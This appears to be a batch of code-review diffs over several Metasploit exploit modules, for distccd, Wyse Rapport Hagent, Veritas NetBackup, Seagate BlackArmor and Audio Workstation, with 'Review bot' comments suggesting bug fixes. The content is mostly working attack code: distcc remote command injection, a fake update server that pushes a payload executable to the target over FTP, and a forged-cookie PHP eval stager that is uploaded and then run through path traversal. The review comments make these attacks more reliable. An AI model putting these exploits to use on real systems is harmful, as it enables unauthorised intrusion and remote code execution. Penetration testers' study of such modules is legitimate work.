self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)


handler

end

end

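Review bot: the target's `'Rets' => [0x01020304, 0x41424344]` are placeholder values that `exploit` never reads; the address actually used is hardcoded as `[0x81b847c].pack('V')` at offset 532, and the comments `# 0x081fc968` and `# 0x081b8138` are bare numbers with no explanation of what they refer to. Either move the working address into `target['Rets']` and read it from there, or delete the unused entry, and say in a comment what the two commented addresses are. `ack` is assigned after each `smb_send` and never inspected; checking the first NT_TRANSACT response before sending the secondary request would let the module tell the operator when the server rejected the setup instead of proceeding blindly.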
@ -1,9 +1,9 @@
##
# $Id$
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

@ -14,20 +14,21 @@ require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'DistCC Daemon Command Execution',
'Description' => %q{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.


},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2004-2687'],

@ -36,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote

],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{

@ -48,16 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' =>
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))

'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 01 2002'
))

register_options(
[
Opt::RPORT(3632)
], self.class)
], self.class)
end

def exploit

@ -65,23 +68,24 @@ class Metasploit3 < Msf::Exploit::Remote

distcmd = dist_cmd("sh", "-c", payload.encoded);
sock.put(distcmd)


dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")


res = sock.get_once(24, 5)


if !(res and res.length == 24)
print_status("The remote distccd did not reply to our request")
disconnect
return
end


# Check STDERR
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]


return if not len
if (len > 0)
res = sock.get_once(len, 5)
res.split("\n").each do |line|

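Review bot: `len = [res].pack("H*").unpack("N")[0]` runs before `return if not len`, and `[nil].pack("H*")` raises TypeError, so the guard never covers the case where `sock.get_once(8, 5)` timed out and returned nil; check `res` first, e.g. `return if res.nil? || res.length < 8`. Reading 8 bytes instead of 4 is the right fix for the decoding itself: 8 hex digits become the 4 raw bytes that `unpack("N")` needs, whereas the old 4-byte read produced only 2 bytes and `unpack("N")` on those yields nil, which is why the stderr branch previously always returned here. `res.split("\n")` after `sock.get_once(len, 5)` needs the same nil check.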
@ -93,34 +97,35 @@ class Metasploit3 < Msf::Exploit::Remote
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]


return if not len
if (len > 0)
res = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stdout: #{line}")
end
end


handler
disconnect
end




# Generate a distccd command
def dist_cmd(*args)


# Convince distccd that this is a compile
args.concat(%w{# -c main.c -o main.o})


# Set distcc 'magic fairy dust' and argument count
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)


# Set the command arguments
args.each do |arg|
res << sprintf("ARGV%.8x%s", arg.length, arg)
end


return res
end

end
end

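Review bot: the stdout block repeats the pattern from the stderr block, so the same nil handling is missing here: `res` from `sock.get_once(8, 5)` must be checked before `[res].pack("H*")`, and `res.split("\n")` after `get_once(len, 5)` needs a nil guard as well; a small helper that reads the 8-byte hex length and the body with those checks would remove the duplication. In `dist_cmd`, `%w{# -c main.c -o main.o}` passes `#` as a literal argument to the compiler command line; a comment saying that is intentional would stop a reader from taking it for a stray comment marker.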
@ -1,35 +1,38 @@
##
# $Id: hagent_untrusted_hsdata.rb
# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
# http://metasploit.com/framework/
##

require 'timeout'
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'kf',
'Version' => '$Revision$',
'References' =>
'Version' => '$Revision: 10998 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],

@ -39,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,

@ -48,46 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'Privileged' => true
'DisclosureDate' => 'Jul 10 2009'
))

register_options([
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
end


def exploit


if(datastore['SRVPORT'].to_i != 21)
print_error("This exploit requires the FTP service to run on port 21")
return
end


# Connect to the target service
print_status("Connecting to the target")
connect()


# Start the FTP service
print_status("Starting the FTP server")
start_service()


# Create the executable with our payload
print_status("Generating the EXE")
@exe_file = generate_payload_exe
if target['Platform'] == 'win'
@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
maldir = "C:\\" # Windows
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
co = "XP"
elsif target['Platform'] == 'linux'
@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
maldir = "//tmp//" # Linux
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
co = "LXS"

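Review bot: replacing the per-platform `Msf::Util::EXE.to_win32pe` / `to_linux_x86_elf` calls with one `@exe_file = generate_payload_exe` above the branch means the executable format is now selected by `Msf::Exploit::EXE` from the target's `'Platform'`, which works for the two targets defined, but the call still sits after `start_service()`, so the FTP server accepts connections while `@exe_file` is nil; move the generation above `start_service()`. The `register_options(` re-wrap and moving `'Privileged' => true` out of the `Targets` block into the info hash above are ordering and whitespace only.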
@ -102,113 +106,122 @@ class Metasploit3 < Msf::Exploit::Remote
'MsfExploit' => self
}
})


# Let this close automatically
add_socket(wdmserver)

wdmserver_port = wdmserver.getsockname[2]
print_status("Starting the HTTP service on port #{wdmserver_port}")




fakerapport = Rex::Socket.source_address(rhost)
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"

# FTP Credentials
# FTP Credentials
ftpserver = Rex::Socket.source_address(rhost)
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftpport = 21
ftpsecure = '0'

incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"

pwn2 =
"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"

pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"

if target['Platform'] == 'win'
pwn = pwn1 + pwn3
pwn = pwn1 + pwn3
elsif target['Platform'] == 'linux'
pwn = pwn1 + pwn2 + pwn3
pwn = pwn1 + pwn2 + pwn3
end
# Send the malicious request
sock.put(mal)


# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: " + resp)

resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")

if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end

print_status("Waiting on a connection to the HTTP service")
begin
Timeout.timeout(190) do
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")

case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
|
||||
res = pwn
|
||||
when /V02/
|
||||
print_status("++ device sending V02 query...")
|
||||
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
done = true
|
||||
|
||||
when /V55/
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
when /POST/ # PUT is used for non encrypted requests.
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
done = true
|
||||
else
|
||||
print_status("+++ sending generic response...")
|
||||
res = pwn
|
||||
done = false
|
||||
while (not done and session = wdmserver.accept)
|
||||
req = session.recvfrom(2000)[0]
|
||||
next if not req
|
||||
next if req.empty?
|
||||
print_status("HTTP Request: #{req.split("\n")[0].strip}")
|
||||
|
||||
case req
|
||||
when /V01/
|
||||
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
|
||||
res = pwn
|
||||
when /V02/
|
||||
print_status("++ device sending V02 query...")
|
||||
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
done = true
|
||||
|
||||
when /V55/
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
when /POST/ # PUT is used for non encrypted requests.
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
done = true
|
||||
else
|
||||
print_status("+++ sending generic response...")
|
||||
res = pwn
|
||||
end
|
||||
|
||||
print_status("Sending reply: #{res}")
|
||||
session.put(res)
|
||||
session.close
|
||||
end
|
||||
|
||||
print_status("Sending reply: #{res}")
|
||||
session.put(res)
|
||||
session.close
|
||||
end
|
||||
end
|
||||
rescue ::TimeoutError
|
||||
rescue ::Timeout::Error
|
||||
print_status("Timed out waiting on the HTTP request")
|
||||
wdmserver.close
|
||||
disconnect()
|
||||
stop_service()
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Waiting on the FTP request...")
|
||||
stime = Time.now.to_f
|
||||
while(not @exe_sent)
|
||||
break if (stime + 90 < Time.now.to_f)
|
||||
select(nil, nil, nil, 0.25)
|
||||
select(nil, nil, nil, 0.25)
|
||||
end
|
||||
|
||||
|
||||
if(not @exe_sent)
|
||||
print_status("No executable sent :(")
|
||||
end
|
||||
|
||||
|
||||
stop_service()
|
||||
wdmserver.close()
|
||||
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
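Review bot: in the accept loop, `next if not req` and `next if req.empty?` jump back to `wdmserver.accept` without closing the `session` that was just accepted, so every empty request leaks a socket until the 190-second `Timeout.timeout` fires; close the session before each `next`. Also the `when /POST/` branch prints "++ device sending V55 query..." (copied from the `/V55/` branch) while its own comment talks about PUT, so the status line should say POST. The `print_status("Received: #{resp}")` change is a real fix: with `"Received: " + resp` a nil `resp` raised TypeError before the `if not resp` check a few lines below could ever run, and the `rescue ::Timeout::Error` rename is the correct constant for the `Timeout.timeout` block.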
@ -220,14 +233,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
c.put("425 Can't build data connection\r\n")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
|
||||
conn.put(@exe_file)
|
||||
c.put("226 Transfer complete.\r\n")
|
||||
conn.close
|
||||
@exe_sent = true
|
||||
end
|
||||
|
||||
|
||||
def on_client_command_size(c,arg)
|
||||
print_status("#{@state[c][:name]} FTP size request for #{arg}")
|
||||
c.put("213 #{@exe_file.length}\r\n")
|
||||
|
|
|
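Review bot: `c.put("213 #{@exe_file.length}\r\n")` answers the FTP SIZE command with a character count; for binary payload data the reply should be the byte count (`@exe_file.bytesize`), which only equals `.length` when the string happens to carry a binary encoding. In the RETR path just above, `conn.put(@exe_file)` is followed by `conn.close` and `@exe_sent = true` without looking at how many bytes were written, so a client that drops the data connection mid-transfer is still recorded as having received the executable.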
@ -1,9 +1,9 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -12,14 +12,15 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'VERITAS NetBackup Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module allows arbitrary command execution on an
|
||||
This module allows arbitrary command execution on an
|
||||
ephemeral port opened by Veritas NetBackup, whilst an
|
||||
administrator is authenticated. The port is opened and
|
||||
allows direct console access as root or SYSTEM from
|
||||
|
@ -27,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 10617 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1389' ],
|
||||
|
@ -50,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
|
@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
res = sock.get(-1,3)
|
||||
|
||||
|
||||
print_status("#{res}")
|
||||
|
||||
handler
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
require 'msf/core'
|
||||
require 'rexml/document'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -22,7 +22,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
without the need for authentication. The cookie can be easily decrypted using a
|
||||
known static encryption key and re-encrypted once the PHP object string has been
|
||||
modified.
|
||||
|
||||
This module has been tested on the STBN300 device.
|
||||
},
|
||||
'Author' => [
|
||||
|
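Review bot: this hunk removes "This module has been tested on the STBN300 device." from the description without replacing it; that sentence is the only hardware scoping the module gives its users, so keep it (or move it to a Notes entry) rather than dropping it.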
@ -87,7 +86,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
headers = res.to_s
|
||||
|
||||
# validate headers
|
||||
if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
|
||||
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
|
||||
# and make sure that the body contains the title we'd expect
|
||||
if res.body.include?('Login to BlackArmor')
|
||||
return Exploit::CheckCode::Appears
|
||||
|
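Review bot: the `incude?` to `include?` correction is needed, since the old `check` raised NoMethodError on any response, but the fingerprint still requires exact matches on `X-Powered-By: PHP/5.2.13` and `Server: lighttpd/1.4.28`, so a device on any other firmware build never reaches the `Login to BlackArmor` title test. Consider matching the `Server:` and `X-Powered-By:` headers with a looser pattern and letting the title check carry the `CheckCode::Appears` decision.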
@ -109,7 +108,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
# Step 1 - Establish a session with the target which will give us a PHP object we can
|
||||
# work with.
|
||||
begin
|
||||
print_status("#{peer} - Establishing session with target ...")
|
||||
print_status("Establishing session with target ...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'GET',
|
||||
|
@ -121,21 +120,21 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
|
||||
cookie_value = $1.strip
|
||||
else
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
|
||||
# then update it so that it's an admin session before re-encrypting
|
||||
print_status("#{peer} - Upgrading session to administrator ...")
|
||||
print_status("Upgrading session to administrator ...")
|
||||
php_object = decode_cookie(cookie_value)
|
||||
vprint_status("#{peer} - PHP Object: #{php_object}")
|
||||
vprint_status("PHP Object: #{php_object}")
|
||||
|
||||
admin_php_object = set_string(php_object, 'is_admin', 'yes')
|
||||
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
|
||||
vprint_status("#{peer} - Admin PHP object: #{admin_php_object}")
|
||||
vprint_status("Admin PHP object: #{admin_php_object}")
|
||||
|
||||
admin_cookie_value = encode_cookie(admin_php_object)
|
||||
|
||||
|
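Review bot: `fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")` is raised after the server did respond (the `res && res.code == 200` test failed), so `Failure::UnexpectedReply` describes it better; keep `Unreachable` for the `Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable` rescue. The two `fail_with` messages also keep the `#{peer} - ` prefix that this same hunk strips from `print_status` and `vprint_status`, so the output style is now inconsistent. Finally, `datastore['COOKIEID']` is interpolated unescaped into `/#{datastore['COOKIEID']}=([^;]+);/`; wrap it in `Regexp.escape`.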
@ -146,7 +145,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
config_time = ::Time.now.to_i
|
||||
|
||||
begin
|
||||
print_status("#{peer} - Extracting existing host configuration ...")
|
||||
print_status("Extracting existing host configuration ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
|
||||
'method' => 'GET',
|
||||
|
@ -167,14 +166,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
else
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Host configuration extracted.")
|
||||
vprint_status("#{peer} - Host configuration: #{host_config}")
|
||||
print_good("Host configuration extracted.")
|
||||
vprint_status("Host configuration: #{host_config}")
|
||||
|
||||
# Step 4 - replace the host device description with a custom payload that can
|
||||
# be used for LFI. We have to keep the payload small because of size limitations
|
||||
|
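Review bot: the same two points as in the session-establishment hunk apply here: `Failure::Unreachable` for "Unexpected response from server." should be `Failure::UnexpectedReply`, and the `#{peer} - ` prefix is removed from `print_good`/`vprint_status` but left in both `fail_with` messages.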
@ -191,7 +190,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
|
||||
stager = Rex::Text.encode_base64(installer)
|
||||
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
|
||||
vprint_status("#{peer} - Stager: #{stager}")
|
||||
vprint_status("Stager: #{stager}")
|
||||
|
||||
# Butcher the XML directly rather than attempting to use REXML. The target XML
|
||||
# parser is way to simple/flaky to deal with the proper stuff that REXML
|
||||
|
@ -203,7 +202,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
vprint_status(xml_payload)
|
||||
|
||||
# Step 5 - set the host description to the stager so that it is written to disk
|
||||
print_status("#{peer} - Uploading stager ...")
|
||||
print_status("Uploading stager ...")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
|
@ -221,16 +220,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Stager uploaded.")
|
||||
print_good("Stager uploaded.")
|
||||
|
||||
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
|
||||
print_status("#{peer} - Executing stager ...")
|
||||
print_status("Executing stager ...")
|
||||
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
|
||||
payload_cookie_value = encode_cookie(payload_php_object)
|
||||
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
|
||||
|
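Review bot: `fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")` fires when `res` exists but is not a 200, so `Failure::UnexpectedReply` fits; reserve `Unreachable` for the connection-error rescue two lines down. The `#{peer} - ` prefix also survives in these messages while it is stripped from `print_status`/`print_good` in the same hunk.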
@ -250,20 +249,20 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
if res && res.code == 200
|
||||
print_good("#{peer} - Stager execution succeeded, payload ready for execution.")
|
||||
print_good("Stager execution succeeded, payload ready for execution.")
|
||||
else
|
||||
print_error("#{peer} - Stager execution failed (invalid result).")
|
||||
print_error("Stager execution failed (invalid result).")
|
||||
errored = true
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
print_error("#{peer} - Stager execution failed (unable to establish connection).")
|
||||
print_error("Stager execution failed (unable to establish connection).")
|
||||
errored = true
|
||||
end
|
||||
|
||||
# Step 7 - try to restore the previous configuration, allowing exceptions
|
||||
# to bubble up given that we're at the end. This step is important because
|
||||
# we don't want to leave a trail of junk on disk at the end.
|
||||
print_status("#{peer} - Restoring host config ...")
|
||||
print_status("Restoring host config ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
'method' => 'POST',
|
||||
|
@ -281,7 +280,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
# Step 8 - invoke the installed payload, but only if all went to plan.
|
||||
unless errored
|
||||
print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
|
||||
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, payload_file),
|
||||
'method' => 'GET',
|
||||
|
@ -325,7 +324,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
cookie_value = xor(block, datastore['XORKEY'])
|
||||
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
|
||||
vprint_status("#{peer} - Cookie value: #{cookie_value}")
|
||||
vprint_status("Cookie value: #{cookie_value}")
|
||||
|
||||
cookie_value
|
||||
end
|
||||
|
|
|
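Review bot: `CGI.escape(...)` is called in `encode_cookie`, but the only requires visible in this diff are `msf/core` and `rexml/document`; add `require 'cgi'` (or use `Rex::Text.uri_encode`) so the module does not depend on something else having loaded CGI first. The `vprint_status` change here is the same peer-prefix cleanup as the rest of the file.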
@ -1,3 +1,14 @@
|
|||
##
|
||||
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
@ -5,27 +16,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
|
||||
When opening a malicious pls file with the Audio Workstation,
|
||||
a remote attacker could overflow a buffer and execute
|
||||
arbitrary code.
|
||||
When opening a malicious pls file with the Audio Workstation,
|
||||
a remote attacker could overflow a buffer and execute
|
||||
arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'germaya_x', 'dookie', ],
|
||||
'Version' => '$Revision: 7724 $',
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-0476' ],
|
||||
[ 'OSVDB', '55424' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4100,
|
||||
